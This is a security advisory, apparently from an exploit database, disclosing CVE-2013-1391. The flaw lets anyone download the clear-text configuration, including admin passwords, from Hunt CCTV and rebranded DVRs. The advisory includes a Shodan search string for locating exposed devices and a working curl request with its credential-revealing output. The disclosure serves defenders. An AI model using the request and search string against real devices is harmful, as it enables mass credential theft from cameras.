Hunt CCTV (and generics brands) Insufficient Authentication

2013.01.28
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

Hunt CCTV (and generics brands) Insufficient Authentication January 17, 2013 - A. Ramos <aramosf @ gmail . com> -- CVE ID: CVE-2013-1391 [reserved] -- Affected Vendors: Hunt CCTV (http://www.huntcctv.com/) ** generic brands from Hunt ** Capture CCTV (http://www.capturecctv.ca/) NoVus CCTV (http://www.novuscctv.com/) Well-Vision Inc (http://well-vision.com/) -- Affected Models: DVR-04 / DVR-04CH (HuntCCTV) DVR-04NC (HuntCCTV) DVR-08 / DVR-08CH (HuntCCTV) DVR-08NC (HuntCCTV) DVR-16 / DVR-16CH (HuntCCTV) CDR 0410VE (CaptureCCTV-HuntCCTV) CDR 0820VDE (CaptureCCTV-HuntCCTV) DR6-704A4H (HuntCCTV) DR6-708A4H (HuntCCTV) DR6-7316A4H (HuntCCTV) DR6-7316A4HL (HuntCCTV) HDR-04KD (unknown-HuntCCTV) HDR-08KD (unknown-HuntCCTV) HV-04RD PRO (Hachi-HuntCCTV) HV-08RD PRO (Hachi-HuntCCTV) NV-DVR1204 (NovusSec) NV-DVR1208 (NovusSec) NV-DVR1216 (NovusSec) TW-DVR604 (Well Vision INC Solutions-HuntCCTV) TW-DVR616 (Well Vision INC Solutions-HuntCCTV) Shodan dork: Basic realm="DVR" server: httpd -mini Shodan results: 46890 Vulnerable: >70% -- Vulnerability Details: You can get the entire backup config with simple GET. No authentication required. All information are in clear text: admin panel, ddns config, ppoe credentials, misc. Example: [aramosf () velouria data]$ curl -v http://x.x.x.x/DVR.cfg | strings |grep -i USER * Trying x.x.x.x... connected * Connected to x.x.x.x (x.x.x.x) port 80 (#0) GET /DVR.cfg HTTP/1.1 User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/ 3.13.1.0 zlib/1.2.3 libidn/1.18 libssh2/1.2.2 Host: x.x.x.x Accept: */* < HTTP/1.0 200 Ok < Server: httpd < Date: Fri, 17 Jan 2013 05:47:02 GMT < Cache-Control: no-cache < Pragma: no-cache < Expires: 0 < Connection: close < Content-Type: application/octet-stream < USER1_USERNAME=iam USER1_PASSWORD=sexy Vulnerable firmware (127 different ones): - 1.1.10 to 1.1.92 - 1.47 to 1.51 - 2.0.0 to 2.1.93 - 3.0.04 to 3.1.92 -- Disclosure Timeline: 2011-09-?? - Vulnerability discovered 2012-12-20 - Published in the book "Hacker Epico" (http://www.hackerepico.com) 2013-01-15 - CVE Assigned 2013-01-20 - Vulnerability reported to vendor 2013-01-24 - Vulnerability reported to GDT (Spain) 2013-01-28 - Public disclosure: http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html -- Alejandro Ramos www.securitybydefault.com

References:

http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top